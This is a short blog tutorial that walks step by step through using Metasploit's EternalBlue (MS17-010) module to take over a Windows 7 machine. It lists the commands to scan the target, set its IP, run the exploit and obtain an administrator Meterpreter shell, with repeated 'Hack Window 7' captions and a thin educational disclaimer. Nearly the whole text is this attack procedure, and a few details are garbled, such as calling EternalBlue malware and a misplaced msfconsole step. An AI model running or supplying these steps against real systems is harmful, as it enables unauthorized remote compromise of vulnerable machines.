Exploiting Eternalblue for shell with Msfconsole


EternalBlue Malware Developed by National Security Agency (NSA) exploiting Windows based Server Message Block (SMBv1) and to be believed the tool has released by Shadow Brokers hackers Group and it has been used for Wannacry Cyber Attack.

we will be exploiting a SMB vulnerability using the Eternalblue exploit which is one of the exploits and this vulnerability existed with windows os which leads to perform Remote Code Execution which was particularly targeted Windows 7 and XP.

It assumes that you already have MetaSploit installed, or that you are running Kali / backtrack Linux. if not Installed,you can download from here https://www.metasploit.com/


Step 1 : Open MetaSploit by using command msfconsole


Hack Window 7 Exploiting Eternalblue for shell with Msfconsole


Step 2 :

Search eternalblue

Hack Window 7 Exploiting Eternalblue for shell with Msfconsole


Step 3 :

msf >use auxiliary/scanner/smb/smb_ms17_010

options


Hack Window 7 Exploiting Eternalblue for shell with Msfconsole


Step 4 : Type command msfconsole

set rhosts 192.168.18.129 [Target I.P]

Hack Window 7 Exploiting Eternalblue for shell with Msfconsole


Step 5 : run


Hack Window 7 Exploiting Eternalblue for shell with Msfconsole


Step 6 :

use exploit/windows/smb/ms17_010_eternalblue

options

Hack Window 7 Exploiting Eternalblue for shell with Msfconsole


Step 7 :

set rhost 192.168.18.129 [Target I.P]

Hack Window 7 Exploiting Eternalblue for shell with Msfconsole


Step 8 : run


Hack Window 7 Exploiting Eternalblue for shell with Msfconsole


Step 9 :

A meterpreter session open!

We now have a full Meterpreter Admin Privilledge shell to the target.


Hack Window 7 Exploiting Eternalblue for shell with Msfconsole



I hope you enjoyed this article.



Sharing is caring

google
linkedin

About Author

Akash is a co-founder and an aspiring entrepreneur who keeps a close eye on open source, tech giants, and security. Get in touch with him by sending an email (akashchugh1994@gmail.com).


You may also like :-




Leave a Comment

Your email address will not be published. Required fields are marked *




Stay Connected

Popular Posts

Get Latest Stuff Through Email


Who Should Read TechTrick?

All the tricks and tips that TechTrick provides only for educational purpose. If you choose to use the information in TechTrick to break into computer systems maliciously and without authorization, you are on your own. Neither I (TechTrick Admin) nor anyone else associated with TechTrick shall be liable. We are not responsibe for any issues that caused due to informations provided here. So, Try yourself and see the results. You are not losing anything by trying... We are humans, Mistakes are quite natural. Here on TechTrick also have many mistakes..